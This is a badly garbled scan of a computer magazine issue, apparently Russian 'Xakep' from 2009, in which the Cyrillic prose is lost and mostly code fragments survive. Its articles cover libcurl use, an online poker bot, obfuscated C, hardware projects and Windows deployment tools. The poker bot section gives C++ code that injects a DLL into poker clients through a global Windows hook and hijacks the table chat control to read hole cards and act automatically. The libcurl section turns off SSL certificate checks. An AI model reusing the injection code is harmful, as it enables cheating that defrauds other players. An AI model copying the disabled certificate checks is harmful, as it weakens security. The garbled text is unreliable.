NULL )
\\
MessageBox(NULL, "I cant load
libcurl","ERROR", 0);
\\
FreeLibrary(cl);
libcurl?
API- , libcurl-
easy- (
http://curl.haxx.se/libcurl/c, ,
).

curl/ curl.h #include <curl/curl.h.
libcurl.dll easy- .
easy-
libcurl
\\
CURL*(__stdcall *curl_easy_init)();
CURLcode(__stdcall *curl_easy_setopt )

(CURL *curl, CURLoption option, ...);
CURLcode (__stdcall *curl_easy_perform )

(CURL *curl);
CURLcode(__stdcall *curl_easy_getinfo )

(CURL *curl, CURLINFO info, ...);
void (__stdcall *curl_easy_cleanup)

(CURL *curl);
struct curl_slist *(__stdcall
x 01 /121/ 09
html-
libcurl

*curl_slist_append )

(struct curl_slist *list,

const char *string);
void (__stdcall *curl_slist_free_all)

(struct curl_slist * list);
\\ DLL
curl_easy_init = (CURL*(__stdcall*)())

GetProcAddress(cl, "curl_easy_init" );
curl_easy_setopt =(CURLcode(__stdcall *)

(CURL *curl, CURLoption option, ...))
GetProcAddress(cl,"curl_easy_setopt");
curl_easy_perform =( CURLcode(__stdcall *)

(CURL *curl))GetProcAddress(cl,

"curl_easy_perform");
curl_easy_cleanup =(void (__stdcall *)(

CURL *curl))GetProcAddress(

cl,"curl_easy_cleanup");
curl_easy_getinfo=(CURLcode(__stdcall *)

(CURL *curl, CURLINFO info,

...))GetProcAddress(cl,

"curl_easy_getinfo");
curl_slist_append = (curl_slist*(__stdcall *)

(struct curl_slist *list,

const char *string))GetProcAddress(

cl,"curl_slist_append" );
curl_slist_free_all=(void(__stdcall *)

(struct curl_slist list))

GetProcAddress (cl,

"curl_slist_free_all");
,
,
. ,
, .

libcurl

links

cURL http://curl.
haxx.se.
info
CURL

PHP

!
093
>> coding
curl_easy_init
libcurl. !
, , URL libcurl
. ,
easy-, :
html-
//
CURL *curl;
// html-

String table;
//
curl = curl_easy_init();
if(curl) {
//

curl_easy_setopt(curl,

CURLOPT_WRITEFUNCTION, Writer);

//

//

curl_easy_setopt(curl, CURLOPT_WRITEDATA,

&table);

// URL

curl_easy_setopt(curl, CURLOPT_URL,

"http://www.xakep.ru/");

// (1- ; 0

)

curl_easy_setopt(curl, CURLOPT_HEADER , 1 );

//

curl_easy_perform(curl);

//

curl_easy_cleanup(curl);
}
, html-
http://www.xakep.ru . table.
CURLOPT_WRITEFUNCTION,Writer). (http://curl.
haxx.se/libcurl/c/curl_easy_setopt.html ,
curl_easy_setopt).
, CURLOPT_WRITEDATA
( ).
DLL Win32, .
curl_easy_setopt(curl, CURLOPT_
WRITEFUNCTION,Writer). , :
094

static size_t Writer(char *data, size_t size,

size_t nmemb, AnsiString *buffer)
{
size_t result = 0;
if(buffer != NULL) {
buffer->Insert(data,buffer->Length()+1);
// buffer
result = size * nmemb;
//

}
return result;
}
,
char *data result
(result = size * nmemb). ,
, , . ,
buffer,
. ,

Memo1->Text= table;
curl_easy_perform.
Memo1 HTML- .

libcurl Builder C++
,
,
.
, libcurl,
HTTP-. :
;
HTTP 1.1
//
curl_easy_setopt(curl, CURLOPT_USERAGENT,

"Mozilla/5.0 (Windows; U; Windows NT 5.1;

en-US; rv:1.8.1.1) Gecko/20061204

Firefox/2.0.0.1");
// , x 01 /121/ 09
>> coding
HTTP- xakep.ru
, HTTP 1.1

CURLOPT_HTTP_VERSION, CURL_HTTP_VERSION_1_1);
, curl_easy_setopt
curl_easy_perform (
). , libcurl (, ,
SmartSniff) .
User-Agent
HTTP 1.1. ,

cURL .
libcurl HTTPS-,
http- , ,
COOKIES. :
// http-
curl_easy_setopt(curl,CURLOPT_PROXY,

"x.x.x.x:yyyy");
curl_easy_setopt(curl, CURLOPT_PROXYUSERPWD,

"user:123");
// cookies
curl_easy_setopt(curl, CURLOPT_COOKIEJAR,

"outfile.txt");
curl_easy_setopt ( curl, CURLOPT_COOKIEFILE,

"outfile.txt" );
// https-

CURLOPT_SSL_VERIFYPEER, 0L);

CURLOPT_SSL_VERIFYHOST, 0L);
,
. curl_easy_setopt,
, IP- - ,
.
curl_easy_setopt CURLOPT_PROXY. -
.
CURLOPT_PROXYUSERPWD -, . ,
curl_easy_setopt CURLOPT_PROXYTYPE;
( HTTP-). ,
cookies.
CURLOPT_COOKIEJAR ,

curl_easy_cleanup, ,
cookies
. CURLOPT_COOKIEFILE , , ,
cookies libcurl. ,
cookies, libcurl . ,
x 01 /121/ 09
,
cookies .
HTTPS- .
CURLOPT_SSL_VERIFYPEER
CURLOPT_SSL_VERIFYHOST, , , . 0,
.

,
CURLOPT_HTTPHEADER.
struct curl_slist. struct
curl_slist
curl_slist_append, curl_slist_free_all
( : http://curl.haxx.se/libcurl/c/curl_slist_append.
html). ,
. ,
easy- 2.
:
curl_slist_append
curl_slist_free_all
//
struct curl_slist *(__stdcall *curl_slist_append )
(struct curl_slist *list, const char *string);
void (__stdcall *curl_slist_free_all)(

struct curl_slist * list);
//
DLL
curl_slist_append=(curl_slist*(__stdcall *) (

struct curl_slist *list,const char *string))

GetProcAddress(cl,"curl_slist_append" );
curl_slist_free_all=(void(__stdcall *)(

struct curl_slist *list)) GetProcAddress(

cl,"curl_slist_free_all");
, ,
. ,
. ,
POST. CURLOPT_POST 1 POST-.
CURLOPT_POSTFIELDS post-.
POST-
// POST-
curl_easy_setopt(curl, CURLOPT_POST, 1);
// POST-
curl_easy_setopt(curl, CURLOPT_POSTFIELDS,

"journal=Hacker");
GET
URL ? ,
&.
,
DLL libcurl Builder C++. ,

cURL,
. , .
, . . .z
095
>> coding

/ baiborodin@gmail.com /
NOTEPAD.EXE
PHOTOSHOP.EXE
POKERSTARS.EXE
IEXPLORE.EXE
XYZ.DLL
XYZ.DLL
XYZ.DLL
XYZ.DLL
INJECT.DLL
INJECT.DLL
INJECT.DLL
INJECT.DLL
POKERBOT.DLL
, ,
Aaloha, ! . , , , .
.
,
online-.

? ? ,
, , , .
, , ,
, . BlackJack ,

. ! , BlackJack,
. , .
, .
: ,
.
096
, -
. , , ,
. , .
.

.
,
. , .
, , .
, .
x 01 /121/ 09
>> coding
Target
Process
Your Bootstrap DLL
(C++)
loads
dvd
.NET Runtime
loads calls
Your
Process

,

,

.
Your Bootstrap DLL

Your Managed
Assembly
(.NET)
links
,
, nline -,
. ,
-,
, , ,
.
, -
- ( ).
(PokerStars
1 ), , ,
. ,
?
, !
- ,
. .
,
.
. , , , .
, ,
.
,
?
, .
, .
, ,
. ,
- , ,
. ,
,
90% .

. ,

. !
! , ?
, ,

? , .
x 01 /121/ 09

,
, . , ,
.
. , , SSH-.
( , )
,
WebMoney,
, .
? .
online
-, ,

, ,
, , , ,
!
, ,
.
, .

.

DLL-. .Net
Windows,
.Net-.
, ,
-.
- .
.Net. , ,
:
namespace MyNamespace
{
public class MyClass
{
// -

online . ,
: www.
pokerstars.com.
Full Tilt Poker

PokerStars online
-: www.
fulltilt.com.

2+2,

-: forumserver.
twoplustwo.com.
Windows
Hook MSDN: msdn.
microsoft.com/enus/library/ms997537.
aspx .
warning

.

,

. :).
097
INJECT.DLL
>> coding
HOTOSHOP.EXE
POKERSTARS.EXE
XYZ.DLL
XYZ.DLL
XYZ.
INJECT.DLL
INJECT.
JECT.DLL
INJECT
IEXPLORE.EXE
POKERBOT.DLL
MS Spy++
public static int MyMethod(String pwzArgument)

{
MessageBox.Show("Hello World");
return 0;
}
}
hr = pClrHost->Start();
// .Net
DWORD dwRet = 0;
hr = pClrHost->ExecuteInDefaultAppDomain(
L"c:\\PathToYourManagedAssembly\\
MyManagedAssembly.dll",
L"MyNamespace.MyClass", L"MyMethod",
L"MyParameter", &dwRet);
,
.

, .Net.
, - , , . . !

. DLL,
.Net
.

DLL-:
#include "MSCorEE.h"
void StartTheDotNetRuntime()
{
// CLR
ICLRRuntimeHost *pClrHost = NULL;
HRESULT hr = CorBindToRuntimeEx(
NULL, L"wks", 0, CLSID_CLRRuntimeHost,
IID_ICLRRuntimeHost, (PVOID*)&pClrHost);
(
,
),
. ,
,
.
(
)
.
098
// CLR
hr = pClrHost->Stop();
//
pClrHost->Release();
}
CLR API.
1. CorBindToRuntimeEx
ICLRRuntimeHost.
2. ICLRRuntimeHost::Start CLR Runtime
.
3. ICLRRuntimeHost::ExecuteInDefaultAppDomain
CLR .

, , , . ,
.
, , , ,
ExecuteInDefaultAppDomain ,
integer. , ,
?
ExecuteInDefaultAppDomain . ,
. ,
.Net-,
,
.
MSDN.
.
? , ,
DLL, .
-.
x 01 /121/ 09
T.DLL
INJECT.DLL
INJECT.DLL
>> coding
POKERBOT.DLL
NOTEPAD.EXE
PHOTOSHOP.EXE
POKERSTARS.EXE
XYZ.DLL
XYZ.DLL
XYZ.DLL
Full Tilt Poker.
, !
DLL-, -. DLL Injection?, .
. - , .
,
.
, , . DLL
Injection , .
DLL Injection .
( ).
,
.
, DLL Injection ,
. , ,

. ,
, ,
. Windows Hook CBT Hook. MSDN Windows Hook,
, SetWindowHookEx
Windows API. ,
:
LRESULT CALLBACK PokerBotCBTProc(int nCode,
WPARAM wParam, LPARAM lParam)
{
if (nCode < 0)
{
return CallNextHookEx(g_hHook, nCode,
wParam, lParam);
}
else if (theInjector.getVenue() !=
Venue_Unknown)
{
if (g_bFirstTime)
{
theInjector.inject();
bFirstTime = false;
}
if (nCode == HCBT_ACTIVATE)
return (LRESULT) theInjector.HandleIt
(Hook_Activate, (HWND)wParam);
else if (nCode == HCBT_CREATEWND)
x 01 /121/ 09
PokerStars
IEX
IN
return (LRESULT) theInjector.

HandleIt(Hook_Create, (HWND)wParam);
else if (nCode == HCBT_DESTROYWND)
return theInjector.HandleIt(Hook_Destroy,
(HWND)wParam);
POKERBOT.DLL
}
return 0;
}
bool OPCHOOK_API InstallHooks()
{
g_hHook = SetWindowsHookEx(WH_CBT, (HOOKPROC)
AutoCBTProc, hInstance, 0);
return g_hHook != NULL;
}
CBT-
( , ). DLL
.
Hello, World! ( ,
), .
: ,
, .
online -,
, .

, . DLL Injection:
bool XPOKERBOTHOOK_API InstallHook()
{
g_hHook = SetWindowsHookEx(WH_CBT,
(HOOKPROC) CBTProc, g_hInstance, 0);
return g_hHook != NULL;
}
-:
LRESULT CALLBACK CBTProc(int nCode,
WPARAM wParam, LPARAM lParam)
{
if (nCode < 0)
return CallNextHookEx(g_hHook, nCode, wParam,
099
EXE
>> NOTEPAD.EXE
coding
PHOTOSHOP.EXE
POKERSTARS.EXE
IEXPLORE.EXE
XYZ.DLL
XYZ.DLL
XYZ.DLL
XYZ.DLL
INJECT.DLL
INJECT.DLL
INJECT.DLL
INJECT.DLL
POKERBOT.DLL
PHOTOSHOP.EXE
POKERSTARS.EXE
IEXPLORE.EXE
XYZ.DLL
XYZ.DLL
XYZ.DLL
Full Tilt Poker
lParam);
else if (!g_pClient)
return 0;
HWND hWnd = (HWND)wParam;
if (!hWnd)
return 0;
INJECT.DLL
INJECT.DLL
POKERBOT.DLL
if (nCode == HCBT_ACTIVATE)
{
if (!g_pClient->IsRegisteredWindow(hWnd))
g_pClient->TryRegisterWindow(hWnd, NULL);
}
else if (nCode == HCBT_DESTROYWND)
{
if (g_pClient->IsRegisteredWindow(hWnd))
g_pClient->UnregisterWindow(hWnd);
}
return 0;
}
.
HCBT_ACTIVATE. , HCBT_DESTROYWND.
. -
. , .
HCBT_CREATEWND
, .
,
. , HCBT_CREATEWND .
HCBT_ACTIVATE
. , ,
.
, EM_STREAMING,
callback .
, .
. , ,
, .
, , ,
.
100
, . , .
:
PokerTimeTableWindow::PokerTimeTableWindow
(HWND hWnd, PokerTimePokerClient* client) :
OnlineTableWindow(hWnd, client)
{
HWND hwndChat = ::FindWindowEx(hWnd, NULL,
_T("RichEdit20W"), NULL);
if (hwndChat)
{
PokerTimeTableWindow::OldRichWndProc =
(WNDPROC)::GetWindowLongPtr(hwndChat,
GWL_WNDPROC);
::SetWindowLongPtr(hwndChat, GWL_WNDPROC,
(LONG_PTR)PokerTimeTableWindow::MyRichWndProc);
}
}
, , .
,
. , , PokerTime, RichEdit.

EM_STREAMIN, :
LRESULT PokerTimeTableWindow::MyRichWndProc
(HWND hWnd, UINT msg, WPARAM wParam, LPARAM lParam)
{
EDITSTREAM* es = (EDITSTREAM*) lParam;
if (msg == EM_STREAMIN)
{
PokerTimeTableWindow::OldRichEditCB =
es->pfnCallback;
es->pfnCallback =
PokerTimeTableWindow::MyEditStreamCallback;
PokerTimeTableWindow::CurrentChatWindow = hWnd;
}
LRESULT lRet = ::CallWindowProc(
x 01 /121/ 09
NOTEPAD.EXE
PHOTOSHOP.EXE
POKERSTARS.EXE
IEXPLORE.EXE
XYZ.DLL
XYZ.DLL
XYZ.DLL
XYZ.DLL
INJECT.DLL
INJECT.DLL
INJECT.DLL
INJECT.DLL
>> coding
POKERBOT.DLL
NOTEPAD.EXE
PHOTOSHOP.EXE
XYZ.DLL
XYZ.DLL
INJECT.DLL
INJECT.DLL
POKERSTAR
XYZ
2+2
PokerTimeTableWindow::OldRichWndProc,
hWnd, msg, wParam, lParam);
if (msg == EM_STREAMIN)
{
es->pfnCallback =
PokerTimeTableWindow::OldRichEditCB;
}
return lRet;
string sCard2 = what[2];

ApplicationProxy::TransmitHoleCards
((sCard1 + sCard2).c_str(), hPokerTable);
}
else if (boost::regex_match(line, what,
regWakeUp,
boost::match_default|boost::match_single_line)
&& what.size() == 3)
{
string theActor = what[1];
if (theActor == g_pClient->LoggedInAs)
OnlinePokerExecutor::PerformAction(
hPokerTable);
}
EM_STRAEMING,
, callback- EDITSTREAMCALLBACK. callback () ().
, ,
:).
PokerTimeTableWindow::OldRichEditCB =
es->pfnCallback;
es->pfnCallback =
PokerTimeTableWindow::MyEditStreamCallback;

,
, . ,
, :
Dealing Hole Cards (Ah, Ad) (
);
Meowt, you have 10 seconds to respond ( , ).
:
DWORD CALLBACK PokerTimeTableWindow::MyEditStrea
mCallback(DWORD_PTR dwCookie, LPBYTE pbBuff, LONG
numberOfBytes, LONG* actualBytes)
{
DWORD dwRet = PokerTimeTableWindow::OldRichEditCB
(dwCookie, pbBuff, numberOfBytes, actualBytes);
if (0 == dwRet && actualBytes && *actualBytes > 0)
{
boost::smatch what;
if( boost::regex_match(line, what, regHoleCards,
boost::match_default|boost::match_single_line) && what.
size() == 3)
{
string sCard1 = what[1];
x 01 /121/ 09
INJEC
POKERB
}
}
.
, ,
.
, .
!
, , . .
( , ),
. .
, -
, -. , .
. , . ,
, . . , , .
:
1. ,
.
2. . .
3. (, , ),
.
, .
, !z
101
>> coding

20h:

, brainfuck, .
, . ,
.
01
, ,
, , MASM,
. ,
, .
. ,
.
:

Twas the night before Christmas
And all through the house
Not a creature was stirring
Not even a mouse
The stockings were hung
By the chimney with care
In hopes that Saint Nicholas
Soon would be there
, , . ,
( ).
( ),
, .

#define Twas int
#define the
#define night main()
#define before {
#define Christmas int number, rightDigit, sign = 0;
#define And
#define all printf("Enter your number: ");
#define through scanf("%d", &number);
#define house if (number < 0)
#define Not
#define a
#define creature {
102
#define
#define
#define
#define
#define
#define
#define
#define
#define
#define
#define
#define
#define
#define
#define
#define
#define
#define
#define
#define
#define
was number = -number;

stirring sign = 1;
even }
mouse do
The {
stockings rightDigit
were = number
hung %
By 10;
chimney printf("%d", rightDigit);
with number /=
care 10;
In }
hopes while
that (number);
Saint if (sign)
Nicholas puts("-");
Soon else
would putchar(\n);
be return 0;
there }
,
, . ,
, ,
(and, a, the)
. , . ,

( MS VC /P),
. ( , ?), .
, ( ),
.
, ,
. , , , .
, ! , ,
x 01 /121/ 09
>> coding
, ,
, .
/* (c) Brian Westley, 1988 */
#define _ 0xF<00? --F<00||--F-OO--:-F<00||--F-OO--;
int F=00,OO=00;
main(){F_OO();printf("%1.3f\n",4.*-F/OO/OO);}F_OO()
{
_-_-_-_
_-_-_-_-_-_-_-_-_
_-_-_-_-_-_-_-_-_-_-_-_
_-_-_-_-_-_-_-_-_-_-_-_-_-_
_-_-_-_-_-_-_-_-_-_-_-_-_-_-_
_-_-_-_-_-_-_-_-_-_-_-_-_-_-_
_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_
_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_
_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_
_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_
_-_-_-_-_-_-_-_-_-_-_-_-_-_-_
_-_-_-_-_-_-_-_-_-_-_-_-_-_-_
_-_-_-_-_-_-_-_-_-_-_-_-_-_
_-_-_-_-_-_-_-_-_-_-_-_
_-_-_-_-_-_-_-_
_-_-_-_
}
02

, , .
. , ,
, . , ,
1 -+- + -+- 1, .

foo(int a){printf("%d\n",a);};main(){foo(
+- -+- -+- -+
////////////.!
////////////./!
////////////.//!
////////////.///!
+ -+- -+- +////!
!!!!!~~!!!!!!////!
!!!!~~!~!!!!!////.
!!!~~~~~~!!!!/////
!!~~!~~!~~!!!////
!~~!!~~!!~~!!///
~~!!!~~!!!~~!//
1 -+- -+- 1
);
}
? ,
, . ,
,
. ,

03

,
. ,
,
x 01 /121/ 09
, .
:
/* (c) Jack Applin and Robert Heckendorn, 1985 */
main(v,c)char**c;{for(v[c++]="Hello, world!\n)";
(!!c)[*c]&&(v--||--c&&execlp(*c,*c,c[!!c]+!!c,!c));
**c=!c)write(!!*c,*c,!!**c);}
, ?
, Hello, world,
. , Hello,
world!
.
, 128
Microsoft Visual C++ 128 . !
, , ( 1985 ,
, ), .
! ,
, execlp(). ,
- ,
, . ,
, , , .
,
,
, .

-,

. HexRays, , , HexRays , , .
Hex-Rays ,
. , ,
,
, (
) , . ,
,
,
, ,
,
.
, , ,
, , :
int __cdecl main(int argc, char **argv, char *envp) {
int res; int v4; bool v5; char **v6; int v7; v4 = argc;
argv[argc] = "Hello, world!\n)";
v6 = (char **)(argv + 1);
res = argv + 1 != 0; v5 = argv + 1 != 0;
if ( (*(argv + 1))[res]) {
do {
v7 = v4--; if ( !v7 ) {
--v6; if ( !v6 ) break;
v5 = 1; res = _execlp(*v6, (char)*v6);
if ( !res) break;
} _write(*v6 != 0, *v6, **v6 != 0);
res = (int)*v6; **v6 = v6 == 0;
} while ( (*v6)[v5] );
} return res;
}z
103
>> phreaking
Vshmuk
/ diver@edu.ioffe.ru /
>>
- -
, , - ,
. , ,
, .

, -, -, ,
, ,
, , .
,
. , , .
. , , , , ,
. ,
:), .
? -, - ()
. , , , .
.
, , .
, .
104
. , .
,
,
, .
, , ,
. .
, .
, , .
(
) ( 20 ) ,

, .
, .

, , -,
USB- .
, ,
x 01 /121/ 09
>> phreaking
( , ), ,
.
, , ,
; () ,
, 5 , -30. 35 . .

.
, .
, ,
,
. ,
, , , .

, geolab.ioffe.net,
,
.
:
(, )
george@switch.ioffe.ru
(gui, ) idfred@gmail.com

, (4
, 1 1 ), USB.
,
, . , GTK+ 2.0/OpenGL libusb, .
(,
),
,
.
?
, ,
,

,
.

. p- n- ,
. ,

,
. .
x 01 /121/ 09
. ,
, ,
. ,
.
MOSFET- (MOSFET Metal
Oxide Semiconductor Field Effect Transistor) ,
( Di_Halta
, . ).
- ,
.
. MOSFET-
, , .
. , ,
. ,
, ! , , . , ,
ARM Advanced
Risc Machines
RISC- (Reduced
Instruction Set Computing),
.
- , ARM . ARM- :
.
.
105
>>
>> pc_zone
phreaking
...
.
-, ( , ) .

.
----.
Analog Devices (, !)
(- )
. ,
. -,
copy-paste . ,
.
. , , .
. ,
- ()
.
106
C -
. ,
,
.
.
: Atmel AT91SAM7X (,
AVR, ARM!), Altera Cyclone, ,
, -,
.
. Altera , ,
, ,
, ,

- .
( , 2,5 ) ,
.
,
- .
,
.
.
, ,
.
x 01 /121/ 09
>>>>phreaking
pc_zone

, . . (USB
COM-), ,
Alter- .
, , . ,
, ,
. ( !) , ,
.
, .

,
, , p-n .
x 01 /121/ 09
- .
,
: , . , 200 .
? ,
(, http://ru.wikipedia.org/wiki/ +
).
P.S. . z
107
>> phreaking
Vshmuk
/ diver@edu.ioffe.ru /

>>
, -. ,
, , , , , . ,
? ,
? , .
,
, - . , .

, .

, ,
, , , , .
,
, .

,
:
, ;
, ;
, .
108
, , . ?
, ,
8. .
. .
,
400 . ,
, , ,
. .
, , ,
.
.

, .
- - ,
x 01 /121/ 09
>> phreaking
.
.
, LC-,
( ) .
,
8,2 .
, . , .
, , -

, . ,
. :).
, (
-, ), ,
, .
, , LC- . ,
, , , .
,
, , , , .
.
8,2 , .

, , .
, : ,
x 01 /121/ 09
, .
9 , Altera MAX II.
!
. ,
8,2 . ,
200-400 . ,
, 9
, . ? , .
9 , 300. ,
1 30. ,
, , ,
, .
2,5 . .
9
. ,
,
300 . - . MOSFET,
, ,
, . , , ,

,
9 ! ,
, ,
. MOSFET LM7313,
- .
, - .
, , -
109
>>
>> pc_zone
phreaking

,
( , ).
,
.
,
, .
.

,
.
, ,
.
.
( )
. .
. -

, ,
- .

, , .

. , ,
. ,

. ,
, .
,
. 127,6 , -
. , .
, :
http://www.antentop.org/004/files/tr004.pdf :
http://www.educypedia.be/electronics/electroniccalculators.htm,
. ,
, javascript electronic
inductance calculator, .
, ,
.
110

,
200 ,
. .
, -.
8,2 , . ,
-
-
- - ,
. . ,
.
, -, , .
, ,
NdFeB-, ,
!
: http://www.
patentgenius.com/patent/5528914.html.
x 01 /121/ 09
>>>>phreaking
pc_zone
! .
, , . ,
.
, !
. !
PS
, ,
. ,
,
. ,
, .
?

.
,
.
,
.
, ,
. (
)
,
. ,
,
.
! ,
!
x 01 /121/ 09
- .

.
- .
, -, .
(,
z!) .
, ,
.
, . , ,
. z
111
>> SYN/ACK
grinder
/ grinder@ua.fm, tux.in.ua /
WAIK: Windows
Windows . , . , ,
, . ,
.
WAIK
Microsoft Windows (AIK), . ,
Windows,
Vista Windows Server 2008. WAIK
:
Microsoft Windows Preinstallation Environment (WinPE) Vista, ;
WAIK, ImageX Windows;
112
Windows Deployment Services (WDS) , RIS;

.
ImageX WIM
(Windows Image) , (Windows System
Image Manager)
. ,
Windows.
? ! ,
,
. , -
x 01 /121/ 09
>> SYN/ACK
WIM-
WAIK
, WAIK.
(AIK) Windows Vista
1 (SP1) Windows Server 2008.
. ,
Windows AIK, Windows,
WinXP SP2.

WAIK . ,
,
WDS (Windows Deployment Services). ,
, !
nLite
(www.nliteos.com). ( Vista)

, , ,
.
DVD- WAIK,
Windows AIK, . C:\Program
Files\Windows AIK. , WAIK 1.1
( , ).
, , ,
ISO- .
, . , Windows PE,
WAIK.
. Windows (Windows System Image Manager, Windows SIM).

, ImageX
. -, , ,
Windows SIM :).
, , , D:\Temp. , WIM-
NTFS.
2 / (, ) FAT32. Sources DVD- install.wim
. WinPE D:\Temp:
PETools> imagex /mountrw d:\install.wim 1 d:\temp
Mounting (RW): [d:\install.wim, 1] -> [d:\temp]
x 01 /121/ 09
/mountrw .
, /mount. : , imagex . /?, .
WinXP SP2, Win2k3 SP1 Vista.
WIM-
WIM FS (Windows Imaging File System Filter).
, , .
WAIK. Tools\x86 ( ia64, Vista), wimfltr.inf .
, , 1 .
, Vista Win2k8 ,
.
, . , /INFO imagex.
PETools> imagex /INFO d:\install.wim
<IMAGE INDEX="1">
<NAME>Windows Vista BUSINESS</NAME>
<IMAGE INDEX="2">
<NAME>Windows Vista HOMEBASIC</NAME>
, 1 Business, 2 HomeBasi ..
, , , , Vista Program Files,
Windows ,
.
,
( MSU) peimg.
. , /inf.
inf- (, d:\
driver), :
PETools>
windows
peimg
/inf=d:\driver\*.inf
/image=d:\temp\
, . , , .
MSU .
expand MSU-. :
expand.exe < MSU> -F:* < >.
'-F' , . -
113
>> SYN/ACK
WIM- GImageX
nLite
.
. :
PETools> expand Windows6.0KB957055x86.msu F:* d:\update
info
Oobe.xml

,

Windows,

.

Samples.

Windows
Deployment Services
z_06_2007.
d:\update
: cab, xml . cab-:
PETools> peimg d:\temp\windows /import=d:\
update\Windows6.0KB957055x86.cab
, .
/install:
PETools> peimg /install=Windows6.0KB957055x
86.cab d:\temp\windows
, , .
.
/list:
PETools> peimg /list /image=d:\temp\windows
, ,
.
, , , /commit :
warning

NTFS.
114
PETools> imagex /unmount /commit d:\temp
, , GImageX (www.autoitscript.com/
gimagex), ImageX. GImageX
WIM , ,
. -
Vista Update Integrator (www.winvistaside.

de/downloads/systemtools) WIM- , ,
, ISO.
Microsoft .NET Framework 3.5.

, , . , ,
,
. , ,
,
, , ,
IE .. .
Windows
.
Vista XML-
,
, .
Unattend.xml. Samples, , WAIK,
.

clg (Windows catalog) .
Sources .
,
. clg Vista (Setup
Manager) (Image Manager).
, .
, Windows (Windows Image) install.wim,
.
. clg-
, ;
, .
,

.
x 01 /121/ 09
>> SYN/ACK
(New Answer File).

,
. (Answer File)
Components Packages. Components Vista, (IE, Media Player ..). (windowsPE, offlineServicing, generalize, specialize, auditSystem,
auditUser oobeSystem). Packages ,
: , , ,
.
.

Windows (Windows Image). ,
. ,

.
,
, ,
.

. , .
Windows
,
x86_MicrosoftWindows-Setup ( ,
x 01 /121/ 09
).
, , .
, ,
Add Setting to Pass 4 specialize (
). . ,
, .
, ,
.
.
UserData, ProductKey.
, Key, ,
WillShowUI
Never. . UserData AcceptEula True .
XML- :
<UserData>
<ProductKey>
<Key>xxxx-xxxx-xxxx-xxxx</Key>
<WillShowUI>OnError</WillShowUI>
</ProductKey>
<AcceptEula>true</AcceptEula>
</UserData>
115
>> SYN/ACK
links
vLite
(www.vlite.net)

Windows.
GImageX
www.autoitscript.
com/files/gimagex/
gimagex.zip.
Vista Update
Integrator (www.
winvistaside.
de/downloads/
systemtools)
,

WIM- ,
, ,
ISO.
Vista Unattended
XML Creator

dc412.
org/unattend.php.

oobeSystem (Outof-Box-Experience)
technet.microsoft.
com/en-us/library/
cc748990.aspx.

OSzone
oszone.net/2985_3.
Windows
AIK
Microsoft.
FullName Organisation .
, DiskConfiguration.
, Disk. Disk.
CreatePartitions
CreatePartitions.
Extend, Order, Size Type
.
.
IE x86_
Microsoft-Windows-InternetExplorer.
, . , UserAgent .. ,
, . ,
, StartPages
StartPageUrl. URL.
Packages
Vista. , :
FeaturePack, Foundation, LanguagePack Product. Foundation Vista,
Product , , .
,
(Add
to Answer File), .
x86_Microsoft-WindowsFoundation-Package. , InboxGames, (
Enabled Disabled).
IIS, (,
telnet) .
, ,
,
. ,
. SYSTEM , :
windowsPE ( Windows) SYSTEM;
auditSystem SYSTEM;
auditUser ;
specialize SYSTEM;
oobetSystem SYSTEM.
, oobeSystem , . , systemdrive%\Hotfix\Windows6.0KB936330X
86wave1.exe. Hotfix
.
Description . XML-
:
<SynchronousCommand wcm:action="add">
<CommandLine>%systemdrive%\Hotfix\Windows6.0
KB936330X86wave1.exe/Q</CommandLine>
<Order>2</Order>
<Description>Hotfix</Description>
</SynchronousCommand>
,
,
:
116
Vista Update
Intergator
cmd /c "FOR %i IN (C D E F G H I J K L N M O P Q
R S T U V W X Y Z) DO IF EXIST %i:\AppsRoot.txt
SETX AppsRoot %i: m"

. , , . : , , .
- BS Post Installer (.
oszone.net/2985_3).

(Validate Answer File). ,
.
:
(Save
Answer File). , ,
-,
.
,
.
,
WIM- ( ,
USB-). oscdimq.exe
WAIK. Vista
d:\Vista, WIM-
.
:
PETools> scdimg -u2 -bd:\Vista\Boot\etfsboot.
com -lMyVista -h d:\Vista d:\MyVista.iso
'-u2' UDF, 'b' , '-l' ,

'-h'
.
Vista Update Integrator vLite (www.vlite.net).
, WAIK,
.
,
,
, ,
. z
x 01 /121/ 09
>> SYN/ACK

Win2k8 WSUS 3.0 SP1
WSUS
Microsoft.

, .
SUS/WSUS,
, Microsoft Update
Microsoft,
. Automatic Updates
( Win2k SP4, WinXP, Win2k3, Vista Win2k8) ,
- Microsoft Update,
. , :
. , Microsoft
. , (, ).
.

( SUS, Software
Update Services) 2002 . WSUS (Windows
Server Update Services) 2.0, .
118

.
2007 ,
32-, 64 . - MMC (Microsoft
Management Console). WSUS .
WSUS 3.0 (
). /
:
, ,
, .
,
.
WSUS 3.0 SP1 (
2008 ).
Vista Win2k8, ,
WMSDE (Microsoft SQL Server Desktop Engine) SP4,
, WSUS RTM.
x 01 /121/ 09
>> SYN/ACK
WSUS IIS
WSUS -

WSUS 3.0 SP1 , Win2k3 SP1, Win2k3 SBS (Small Business Server) Win2k8.

WinXP SP2
Win2k8. , ,
WSUS, . Win2k8
- IIS 7.0, . , .
- (IIS)
Windows. , . Windows
Authentication (Windows ), ASP.NET (
;
), IIS Management Compatibility ( IIS 6) Metabase Compatibility IIS 6 (
IIS 6). IIS. BITS 2.0 .NET Framework 2.0, Win2k3, Win2k8, .
Microsoft Report Viewer Redistributable 2005 (go.microsoft.com/fwlink/
?LinkID=70410).
WMSDE.
SQL- SQL Server 2005
SP2 (go.microsoft.com/fwlink/?LinkId=84823).
WSUS 3.0 RECURSIVE_TRIGGERS, SQL Server
. sp_configure,
:
. (, ).
Windows Update HTTP- HTTPS-,
. -,
, ,
.
64 , IIS . - IIS 32 , ,
, .
WSUS 3.0 Win2k8 IIS. , , - %WINDIR%\
system32\inetsrv\applicationhost.config. ,
<System.webServer> <modules> <add
name="CustomErrorMode">, <System.webServer>
<modules> <remove name="CustomErrorMode">.
, :
sp_configure 'nested triggers'
SQL Server
SSMS (SQL Server Management Studio). , SQL . , Microsoft SQL Server 2005 SQLCMD
(Microsoft SQL Server 2005 Command Line Query Utility),
SQL Server .
Microsoft.
, -, . WSUS , NTFS ( , ). 1 WSUS,
2 20
x 01 /121/ 09
<System.webServer>
<modules>
<remove name="CustomErrorMode">
</modules>
</System.webServer>

. , WSUS
Active Directory. , .
WSUS 2.0 (RTM Release
to manufacturing) WSUS 3.0 WSUS 3.0 SP1. WSUS 3.0 , .
Microsoft Windows Server Update Services 3.0, Microsoft TechNet.
WSUS
